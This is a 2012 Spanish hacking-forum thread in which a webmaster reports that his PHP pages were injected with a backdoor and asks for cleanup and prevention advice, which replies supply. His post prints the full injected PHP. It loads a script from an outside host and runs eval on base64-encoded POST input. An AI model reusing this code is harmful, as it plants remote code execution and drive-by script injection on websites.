elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Mi web.. pobrecita.. jeje		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Mi web.. pobrecita.. jeje  (Leído 3,943 veces)
bruno9111

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Mi web.. pobrecita.. jeje
« en: 8 Marzo 2012, 16:02 pm »
Hola a todos!
Bueno después de años de inactividad en en elhacker.net he tenido que volver y esta vez mira como es el destino pues para hacer una pregunta de seguridad! jeje.

Bueno pues desde que deje el tema de exploit y desfaces, sniffer etc me he dedicado a programar en php, jquery y bueno todas esas cosas.

En una de las webs, la mas grande diria yo, intentando programar desde el trabajo con codeanywhere, me he dado cuenta de que tengo un backdoor

todos mis paginas.php empienzan asi:

      global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

Ademas tenida 8 archivos que no tenian nada que ver con mi web y que nada pues ya elimine.
Esto es como los cuernos o es la primera vez que me pasa esto, o es la primera vez que me doy cuenta. jeje

Entonces tengo varias preguntas, a ver si alguien me ayuda..

1- Eliminando los files nuevos que habia en mi web y borrando las primeras lineas de cada pagina desinfecta mi web?

2- Como entro eso a mi web? osea por que tipo de vulnerabilidad?

3- hay alguna manera de prevenir?

4- hasta que punto esta infeccion hace daño, osea puedo dar por sentado que el intruso tiene la password de todas mis cosas? solo del ftp? solo de las cuentas privadas de mi web?

Desde ya muchas gracias a quien se tome el tiempo, sea de leer que de responder!

Un saludo! :)
En línea
h3ct0r

Desconectado Desconectado

Mensajes: 108


Hail to the king baby!


Ver Perfil
Re: Mi web.. pobrecita.. jeje
« Respuesta #1 en: 10 Marzo 2012, 14:44 pm »
Hola bruno,

Citar
1- Eliminando los files nuevos que habia en mi web y borrando las primeras lineas de cada pagina desinfecta mi web?
No necesariamente, dependiendo del tipo de configuracion del servidor o vulnerabilidad de la pagina pudieron haber infectado otros archivos, instalado un rootkit, etc. Estas en un hosting compartido? Si es asi, otros sitios tambien pueden tener puertas traseras abiertas pudiendo volver a infectar, modificar, y tener acceso a todos tus archivos.

Citar
2- Como entro eso a mi web? osea por que tipo de vulnerabilidad?
Pueden ser muchisimas, desde una configuracion deficiente en el servidor que te da hosting, a un exploit a una version de ftp vieja, o un sqlInjection y te instalaron una shell. Revisa tus logs, es una de las pocas maneras de saber que fue lo que paso y si el host no es tuyo reclamale a la empresa que te da hosting, aunque con tanto acceso que tuvieron puede que los invasores los borraron los logs.

Citar
3- hay alguna manera de prevenir?
Si, si el hosting no cambia sus politicas de seguridad (si fue su culpa la invasion, claro)  cambia de hosting, y revisa muy bien tus scripts para solventar cualquier problema de sql injection, LFI, RMI, xss, crsf, etc. Es importante que le hagas auditrias de seguridad a tu sitio regularmente con las nuevas vulnerabilidades encontradas (Aqui en el foro siempre encontraras algo para probar). Si usas un framework, como wordpress, joomla, o parecidos mantenlos actualizados. Y nunca confies en plugins o modulos de terceros ya que generalmente esos son puntos de acceso para atacantes por ser mal codificados.

Citar
4- hasta que punto esta infeccion hace daño, osea puedo dar por sentado que el intruso tiene la password de todas mis cosas? solo del ftp? solo de las cuentas privadas de mi web?
Tenlo por seguro que si tuvo acceso a tus archivos ya agarro los archivos de configuracion de tu base de datos. Yo te recomendaria que cambies todas tus contrasenas y reportes a tus clientes lo sucedido para que tambien hagan lo mismo. Espero que tengas todas tus contrasenas e informaciones importantes codificadas en algo mejor que MD5. Hay bastantes "crackers online" de md5 y encuentras practicamente la mayoria de passwords usados.

Saludos!!
En línea
[img[/img]
disaster

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Mi web.. pobrecita.. jeje
« Respuesta #2 en: 27 Abril 2012, 22:03 pm »
te dejo esta pagina que te va a ayudar perfectamente ...

http://www.segu-info.com/
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Una duda tontaaa...jeje
Electrónica 		jpgbps 1 2,083 Último mensaje 5 Agosto 2006, 00:04 am
por GrTk
Sobre resoluciones jeje
Multimedia 		WildFroVII 0 1,938 Último mensaje 15 Abril 2008, 15:06 pm
por WildFroVII
Ayuda (que novedad no?? jeje) « 1 2 »
Ingeniería Inversa 		KJD 17 8,393 Último mensaje 14 Enero 2009, 00:38 am
por KJD
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines